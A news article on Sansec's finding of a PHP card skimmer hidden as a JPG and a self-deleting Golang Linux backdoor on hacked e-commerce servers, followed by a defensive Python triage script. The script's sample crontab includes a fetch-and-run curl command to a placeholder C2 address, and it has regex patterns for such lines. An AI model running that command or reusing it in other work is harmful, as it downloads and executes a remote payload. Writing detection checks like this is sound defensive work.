Nov 19, 2021

Hackers deploy Linux malware, web skimmer on e-commerce servers

Security researchers discovered that attackers are also deploying a Linux backdoor on compromised e-commerce servers after injecting a credit card skimmer into online shops’ websites.
The PHP-coded web skimmer (a script designed to steal and exfiltrate customers’ payment and personal info) is added and camouflaged as a .JPG image file in the /app/design/frontend/ folder.
The attackers use this script to download and inject fake payment forms on checkout pages displayed to customers by the hacked online shop.
“We found that the attacker started with automated eCommerce attack probes, testing for dozens of weaknesses in common online store platforms,” the Sansec Threat Research Team revealed.
“After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a webshell and modified the server code to intercept customer data.”
Sansec - linux_avp Linux Golang malware
The Golang-based malware, spotted by Dutch cyber-security company Sansec on the same server, was downloaded and executed on breached servers as a linux_avp executable.
Once launched, it immediately removes itself from the disk and camouflages itself as a “ps -ef” process that would be used to get a list of currently-running processes.
While analyzing the linux_avp backdoor, Sansec found that it waits for commands from a Beijing server hosted on Alibaba’s network.
They also discovered that the malware gains persistence by adding a new crontab entry that re-downloads the malicious payload from its command-and-control server and reinstalls the backdoor if it is detected and removed, or if the server restarts.
As of publication, this backdoor remains undetected by anti-malware engines on VirusTotal, even though a sample was first uploaded more than one month ago, on October 8th.
The uploader might be the linux_avp creator since it was submitted one day after researchers at Dutch cyber-security company Sansec spotted it while investigating the e-commerce site breach.
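As an added, defensive example (not Sansec's or BleepingComputer's code), the three behaviours described above can each be turned into a host triage check: a process claiming to be "ps -ef" whose binary has been deleted, a crontab entry that fetches a URL and executes the result, and a "JPG" under app/design/frontend/ that is really PHP. All inputs are constructed samples; the C2 address 198.51.100.7, the file paths and the pids are placeholders, not the real indicators.

```python
import re

# 1. Process check: the backdoor deletes its own binary and presents itself as
#    "ps -ef". On a live host exe comes from os.readlink(f"/proc/{pid}/exe") and
#    cmdline from /proc/{pid}/cmdline; here the tuples are constructed samples.
def find_masquerading_processes(procs):
    """procs: iterable of (pid, exe_link_target, cmdline). Returns flagged pids."""
    hits = []
    for pid, exe, cmdline in procs:
        claims_ps = cmdline.split()[:1] == ["ps"]
        deleted = exe.endswith("(deleted)")
        if claims_ps and (deleted or exe not in ("/usr/bin/ps", "/bin/ps")):
            hits.append(pid)
    return hits

# 2. Crontab check: persistence is a cron job that re-downloads the payload from
#    the C2 and runs it, so flag entries that both fetch a URL and execute.
FETCH = re.compile(r"\b(curl|wget)\b.*https?://")
EXEC = re.compile(r"\|\s*(ba)?sh\b|\bchmod\b|;\s*/\S+")

def find_cron_fetchers(crontab_text):
    return [line for line in crontab_text.splitlines()
            if line and not line.startswith("#")
            and FETCH.search(line) and EXEC.search(line)]

# 3. File check: the skimmer is PHP stored as a .jpg under app/design/frontend/.
#    A real JPEG starts with FF D8 FF; a PHP open tag in the header gives it away.
JPEG_MAGIC = b"\xff\xd8\xff"

def find_php_disguised_as_jpg(files):
    """files: dict of path -> leading bytes of that file."""
    return [p for p, head in files.items()
            if "/app/design/frontend/" in p and p.lower().endswith(".jpg")
            and not head.startswith(JPEG_MAGIC) and b"<?php" in head[:64]]

# Constructed samples (not real data): one benign and one suspicious item each.
SAMPLE_PROCS = [(812, "/usr/bin/ps", "ps -ef"),
                (2043, "/tmp/linux_avp (deleted)", "ps -ef"),
                (2050, "/usr/sbin/nginx", "nginx: worker process")]
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://198.51.100.7/linux_avp -o /tmp/.x; chmod +x /tmp/.x; /tmp/.x
"""
SAMPLE_FILES = {
    "/var/www/app/design/frontend/Vendor/theme/web/images/logo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF",
    "/var/www/app/design/frontend/Vendor/theme/web/images/banner.jpg": b"<?php /* constructed skimmer stub */",
}

def run_triage(procs=SAMPLE_PROCS, crontab=SAMPLE_CRONTAB, files=SAMPLE_FILES):
    return {"processes": find_masquerading_processes(procs),
            "cron": find_cron_fetchers(crontab),
            "files": find_php_disguised_as_jpg(files)}
```

Calling run_triage() on the samples flags pid 2043, the curl-and-chmod cron line, and banner.jpg; on a real host, feed it the contents of /proc, the crontabs of root and the web user, and the theme directory instead.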